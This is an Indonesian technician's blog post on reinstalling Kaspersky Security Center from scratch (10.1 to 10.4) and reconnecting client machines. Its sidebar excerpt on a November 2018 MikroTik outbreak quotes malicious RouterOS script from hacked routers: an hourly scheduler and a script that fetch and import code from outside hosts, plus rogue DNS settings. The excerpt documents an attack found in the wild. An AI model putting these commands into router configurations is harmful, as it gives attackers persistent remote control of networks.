Langsung ke konten utama

Troubleshoot : install ulang KSC dari nol (upgrade KSC 10.1 to KSC 10.4) - koneksi ulang client

email : ariyaandro@gmail.com

untuk melihat install KSC 10 kurang lebihnya dapat dilihat di posting sebelumnya yaitu

https://pmdkduaonline.wordpress.com/2018/01/15/kaspersky-security-center-10-kaspersky-endpoint-10-install-and-setting-2018/

skenario upgrade :

  • tidak melakukan backup database KAV atau settingnya pada KSC
  • hanya backup package installer sebelumnya saja yang ter sharing di KLSHARE
  • uninstall KES 10
  • uninstall KSC 10
  • uninstall Ms.SQL Express bawaan awal install KSC (hanya digunakan diawak dan sudah dipindahkan ke ms.sql sendiri bukan express)
  • delete database KAV di ms.sql server
  • restart server
  • install KSC 10 baru 10.4
  • database KAV masuk kembali ke ms.sql sendiri pada server (bukan buat ms.sql express)
  • install finish, dan menyesuaian ulang kembali
  • install Kaspersky Security for Windows Server (for file server – rekomendasi untuk server)

kasus dan cara di atas ini mempunyai efek, komputer client yang sudah ada kaspersky nya tidak akan masuk ke daftar KSC. hal ini wajar dikarenakan kasusnya adlah remove kaspersky server hingga ke database KAV tanpa ada backup.

maka untuk measukan kembali ke KSC bisa menggunakan langkah dari link berikut

https://support.kaspersky.com/9290

butuh command promt windows tentunya jalan sebagai administrator. berukut hasil output nya yang dapat dilihat bila berhasil…

anydesk00009

tampak dilihat bahwa semua step “OK”, yang sebagai acuan di atas yaitu memakai ip address

lalu coba cek ke managed device di KSC nya, seharusnya bila benar2 lancar langkah di atas akan masuk list.

salam rekan teknisi seprofesi
__________________________________
link profile teknis penulis

email : ariyaandro@gmail.com

Komentar

Postingan populer dari blog ini

Mikrotik : Wabah November 2018

email : ariyaandro@ gmail.com post yang lalu yaitu : Mikrotik : Serangan Hajime Botnet ke seluruh mikrotik dunia Mikrotik : Wabah september 2018 Mikrotik : Wabah Oktober 2018 update temuan script hacked yang baru lagi,…   /system scheduler add interval=1h name=updateSZJS on-event=":do {/tool fetch url=\"http://meag\ han. pythonanywhere.com /\" dst-path=tmp} on-error={:put \"get http error\"}\ ;\r\ \n/import tmp;\r\ \n/file remove tmp;" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\ mar/31/2018 start-time=20:21:00 /system script add name=script4_ owner=xxx policy=\ ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\ ddress= 95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-resu\ lt=no"   /ip dns set allow-remote-requests=yes servers=" 94.247.43.254,1\ 07.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141 " /ip firewall nat add action=redirect chain=dstnat comme...

Troubleshoot : Cek dan Menurunkan Beban CPU Mikrotik karena SPI Service

email : ariyaandro@gmail.com POSTING 813 kapan lalu mimin mengalami kendala jaringan yang sedikit melemah dan ternyata ada gangguan load CPU pada mikrotik seri 2011UiAS-2HnD, lanjut gunakan tutorial berikut untuk menemukan dugaan yang ada Cara Mengetahui Proses yang Menyebabkan CPU Usage Tinggi di Mikrotik akhirnya terpantau CPU tinggi walau kondisi idle di luar jam kerja di beberapa minggu trakhir dengan rerata CPU load hampir 50 %, pertama untuk meastikan disable atau hapus rule yang tak terlalu wajib utk sementara. namun kendala CPU load cukup tinggi, dugaan rentang sekitar 2 minggu trakhir ada update OS itu yang mengakibatkan ada bug yang berimbas ke service SPI. dikarenakan router yang sama di lokasi berbeda dengan OS update yang sama dengan rule yang hampir sama jumlah aktifnya tidak mengalami load cukup tinggi. Cara Memperkecil Load CPU Mikrotik hasil pengecekan tool-profile ternyata service SPI yang sedang bermasalah memakan resource cukup tinggi dan merepotkan traffic jaringan...

Troubleshoot : intel management engine interface - shutdown problem - can't power off

email : ariyaandro@gmail.com POSTING 797 beberapa waktu lalu mimin ada sedikit problem yang menggangu yaitu ketika PC melakukan proses shutdown selesai, power PC tidak bisa langsung off sempurna (diakhir proses shutdown hanya dim warna hitam saja pada layar) harus dimatikan paksa. namun dengan solusi berikut syukurlah membantu kembali lancar shutdown dengan baik. spek yang sedang digunakan PC yang problem ini yaitu menggunakan Windows 10 Pro 64 bit. setelah mencari artikel yang sesuai berikut https://forums.tomshardware.com/faq/fix-intel-registered-management-engine-interface-has-a-driver-problem.3274586/ https://tencomputer.com/intel-management-engine-interface-driver/ https://www.drivereasy.com/knowledge/intel-r-management-engine-interface-this-device-cannot-start-on-windows-solved/ https://community.spiceworks.com/topic/2095008-remove-intel-management-engine kesimpulan , ada kemungkinan masalah driver yaitu intel management engine interface. maka dilakukan rekomendasi uninstall driv...